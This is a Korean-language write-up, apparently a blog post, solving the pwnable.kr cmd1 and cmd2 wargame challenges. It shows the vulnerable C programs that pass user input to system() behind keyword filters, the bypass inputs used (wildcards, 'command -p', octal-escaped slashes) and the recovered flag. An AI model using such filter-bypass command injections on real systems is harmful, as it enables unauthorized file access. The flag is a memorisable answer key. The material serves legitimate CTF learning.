cmd1
1
2
3
| Mommy! what is PATH environment in Linux?
ssh cmd1@pwnable.kr -p2222 (pw:guest)
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| /* cmd1.c */
#include <stdio.h>
#include <string.h>
int filter(char* cmd){
int r=0;
r += strstr(cmd, "flag")!=0;
r += strstr(cmd, "sh")!=0;
r += strstr(cmd, "tmp")!=0;
return r;
}
int main(int argc, char* argv[], char** envp){
putenv("PATH=/thankyouverymuch");
if(filter(argv[1])) return 0;
system( argv[1] );
return 0;
}
|
Solution
1
2
| cmd1@pwnable:~$ ./cmd1 '/bin/cat fla*'
mommy now I get what PATH environment is for :)
|
cmd2 (풀이 봄)
1
2
3
4
| Daddy bought me a system command shell.
but he put some filters to prevent me
from playing with it without his permission...
but I wanna play anytime I want!
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
| #include <stdio.h>
#include <string.h>
int filter(char* cmd){
int r=0;
r += strstr(cmd, "=")!=0;
r += strstr(cmd, "PATH")!=0;
r += strstr(cmd, "export")!=0;
r += strstr(cmd, "/")!=0;
r += strstr(cmd, "`")!=0;
r += strstr(cmd, "flag")!=0;
return r;
}
extern char** environ;
void delete_env(){
char** p;
for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}
int main(int argc, char* argv[], char** envp){
delete_env();
putenv("PATH=/no_command_execution_until_you_become_a_hacker");
if(filter(argv[1])) return 0;
printf("%s\n", argv[1]);
system( argv[1] );
return 0;
}
|
cmd2 Solution(풀이 봄)
1
2
3
4
5
| /bin/cat fla* 가 불가능함.
엄청 오래 생각해봤지만.. 실패해서 답지를 확인함.
내가 풀이를 보면서 이해한 방법은 두 가지가 있음.
|
1. command 명령어 사용
$ help -- command
command: command [-pVv] command [arg ...]
Execute a simple command or display information about commands.
Runs COMMAND with ARGS suppressing shell function lookup, or display
information about the specified COMMANDs. Can be used to invoke commands
on disk when a function with the same name exists.
Options:
-p use a default value for PATH that is guaranteed to find all of
the standard utilities
-v print a description of COMMAND similar to the `type' builtin
-V print a more verbose description of each COMMAND
Exit Status:
Returns exit status of COMMAND, or failure if COMMAND is not found.
1
2
3
| command 명령어는 cat 같은 간단한 명령어들을 실행시켜 줄 수 있음.
command -p 를 해주면 defalut PATH 값으로 명령어를 실행시켜줌.
|
cmd2@pwnable:~$ ./cmd2 'command -p cat fla*'
command -p cat fla*
FuN_w1th_5h3ll_v4riabl3s_haha
2. linux ascii-code 중 oct 값 사용
http://www.seren.net/documentation/unix%20utilities/Linux_Cheat_Sheet.htm
Linux Cheat Sheet에 보면 위에 있는 command 명령어도 써있고, 밑에 ASCII-CODE 값도 있음.
1
2
3
4
5
6
| dec hex oct char
46 2E \056 .
47 2F \057 /
48 30 \060 0
|
cmd2@pwnable:~$ ./cmd2 '$(echo "\057"bin"\057"cat fla*)'
$(echo "\057"bin"\057"cat fla*)
FuN_w1th_5h3ll_v4riabl3s_haha
printf 명령어로도 되는지 확인해보았음. 필터링에 걸리는지 확인해보려고 로컬 환경에서 테스트 해봄.
:~$ ./test '$(printf "\x2fbin\x2fcat fla*")'
0
argv[1] : $(printf "\x2fbin\x2fcat fla*")
:~$ printf "\x2fbin\x2fcat fla*"
/bin/cat fla*
잘 나오는 것 같아서 해보니까 실패함.
cmd2@pwnable:~$ ./cmd2 '$(printf "\x2fbin\x2fcat fla*")'
$(printf "\x2fbin\x2fcat fla*")
sh: 1: \x2fbin\x2fcat: not found
직접 system 함수에 인자로 줘봤지만 echo만 나오고 실패.
그냥 안되나봄.